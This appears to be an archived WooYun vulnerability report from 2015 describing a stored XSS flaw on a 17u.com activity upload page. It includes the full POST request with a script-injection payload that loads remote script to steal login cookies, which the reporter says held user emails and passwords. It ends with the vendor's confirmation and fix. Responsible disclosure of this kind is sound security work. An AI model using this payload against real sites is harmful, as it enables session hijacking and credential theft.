乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-14: 细节已通知厂商并且等待厂商处理中 2015-01-14: 厂商已经确认,细节仅向厂商公开 2015-01-24: 细节向核心白帽子及相关领域专家公开 2015-02-01: 厂商已经修复漏洞并主动公开,细节向公众公开
RT
漏洞存在于http://www.17u.com/activity/17u-shajiabang/blogUpload.aspx登录后在活动结束后仍然可以发布参赛作品,可以欺骗用户或管理员来登录,可成功获取cookie,cookie中带有登录的邮箱及密码发布作品的post包:
POST /activity/17u-admin/COMModel/actionfun/form_upload_blog_action.aspx?_tid=39 HTTP/1.1Host: www.17u.comProxy-Connection: keep-aliveContent-Length: 159Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.17u.comUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://www.17u.com/activity/17u-shajiabang/blogUpload.aspxAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4Cookie: testcookie=yes; ASPSESSIONIDAQRRSDAB=KCIJIGEDLOBKODIJOFLFIAKD; BIGipServerwww-17u-com-pool=2130841772.8451.0000; BIGipServercommvc-pool=2583826604.8707.0000; bdshare_firstime=1420202090700; SourceUrl=url=http%3a%2f%2fwww.17u.com%2fhotel%2f; ASP.NET_SessionId=s4lekwivrm5ds5yctsv3cpid; BIGipServercom-activity-pool=3959597248.8451.0000; ASPSESSIONIDASQQTABA=JEFFJNEDJMOBGCKFAIAKDMAD; testcookie=yes; B2cCnMemberAutoStat=yes; Hm_lvt_986b306b86a73dcdd6bba6241561cbae=1420202129,1420202154,1420202262,1420202301; Hm_lpvt_986b306b86a73dcdd6bba6241561cbae=1420206920; autologintocn=Y; COMSEInfo=RefId=6158806&SEFrom=&SEKeyWords=&RefUrl=https%3A%2F%2Fwww.sssis.com%2F; B2cCnMemberLogStat=userid=49757182&nickName=lkjklkjl&token=180131051238040189120112112030181189091012185184176015018113043215061206097186229171025011200228020023109048101041176039000135067116108073182157203252061193066187005003097076053234240126158253184206045252193064000162; b2c%5Fcn%5Fmember%5Finfo=cityhomepageId=224&truename=15240233761&userArea=3106%2C1%2C0%2C0%2C0&user%5Fscore=101; has_js=1; __tctmc=55197035.153955134; __tctmd=55197035.737325; __tctma=55197035.1419732838194351.1420201974883.1420201974883.1420204486800.2; __tctmb=55197035.3073099855560704.1420206870433.1420207060972.15; __tctmu=55197035.0.0; __tctmz=55197035.1420204486800.2.5.utmccn=(referral)|utmcsr=sssis.com|utmcct=|utmcmd=referral; longKey=1419732838194351txtTitle=asdsadas&txtImageUrl="此处为xss代码&txt_Content=</script/</textarea/"'><script/src=//xxxx></script/1&txtvalidCode=22
用户在http://www.17u.com/activity/17u-shajiabang/活动登录即可,已经成功打到17u.com的内部用户:
cookie中带有用户名密码信息:
已经成功登录:
你们懂的
危害等级:中
漏洞Rank:10
确认时间:2015-01-14 11:24
感谢关注同程旅游,上次rank给少了,这次补上点。今天会清理下这类过期的孤岛页面。ps:cookie里看到楼主用的这个谷歌搜索镜像还不错 https://
2015-02-01:公开